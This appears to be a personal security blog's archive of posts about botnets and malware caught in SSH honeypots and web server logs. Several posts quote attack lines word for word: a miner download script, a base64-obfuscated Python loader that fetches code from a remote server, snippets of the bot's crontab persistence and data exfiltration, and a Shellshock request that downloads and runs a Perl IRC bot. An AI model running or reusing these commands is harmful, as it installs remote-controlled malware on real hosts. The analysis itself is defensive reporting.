Archive for the ‘Bots’ Category

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot-entry catched my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u=”http://www.bizqsoft.com/tp2/r6.log”
else u=”http://www.bizqsoft.com/tp2/r.log”
fi
wget -O /tmp/run
curl -o /tmp/run
python -c “import urllib;urllib.urlretrieve(‘$u’,’/tmp/run’)”

Looking into the downloaded binary one finds this miner for
the cryptocoin “sumokoin” using the “cryptonight” algorithm:

{“algo”:”cryptonight”,”av”:0,”background”:false,”colors”:true,”cpu-affinity”:nul
l,”cpu-priority”:null,”donate-level”:5,”log-file”:null,”max-cpu-usage”:75,”print
-time”:60,”retries”:5,”retry-pause”:5,”safe”:false,”syslog”:false,”threads”:null
,”pools”:[{“url”:”pool.sumokoin.hashvault.pro:80″,”user”:”Sumoo6Au3wBiUakx2yC748
Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon”,”
pass”:”x86_64″,”keepalive”:true,”nicehash”:false},{“url”:”pool.sumokoin.com:3333
“,”user”:”Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrY
r8pUpDkhG5MHUjf7XX64WoxR4kxon”,”pass”:”x86_64″,”keepalive”:true,”nicehash”:false
},],”api”:{“port”:0,”access-token”:null,”worker-id”:null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchainexplorer I currently find no transactions linked
to that address, but that may be because of the nature of sumokoin ..

Linux Botnet

Wednesday, January 10th, 2018

another nice ssh honeypot-catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a base64-encoded complete python-program from  http://k.zsw8.cc/Api/

In that program a crontab-entry is made

   if runCodePath not in crontabData:
                f = open("/etc/crontab", "a+")
                f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it loads data about the hacked server to the herder:

   my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
            f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

 

  if data.has_key("download") and data["download"]:
                    DownExec(data["download"], task_id)
       if data.has_key("cmd") and data["cmd"]:
                    CmdExec(data["cmd"], task_id)

Wonder what would happen if the computer name would be a beef-xss hook or something..?

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver-logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi
HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget
http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch
http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl
fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl installs an irc-connection and waits for commands like
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to shellshock ..

DDoS – cheaper than I thought..

Monday, September 29th, 2014

Recently I fell about an advertisement for a DDoS – Attack Service in the tor-network – it was way cheaper than I thought.

25 minutes of 150 Gbps costs only 15$; a silver paket for 1 hour is available for 20$ and a whole week with a hour/day downtime can be bought in a gold-paket for only 60$.  These darknets are really dark these days…

bitbucket decrypt bitcrypt

Friday, February 21st, 2014

The evil bitcrypt malware, which encrypts files on hijacked pc and offers the decryption key

for a payment of 260 € has a serious flaw in the encryption design, Heise reported.

Fabien Perigaud und Cedric Pernet from bitbucket.org managed to find out that the used RSA-Key

had a length of 128 instead of 128 Byte; So they were able to crack the 426 bit key in 43 hours.

The free python-script is here available. Cool stuff 🙂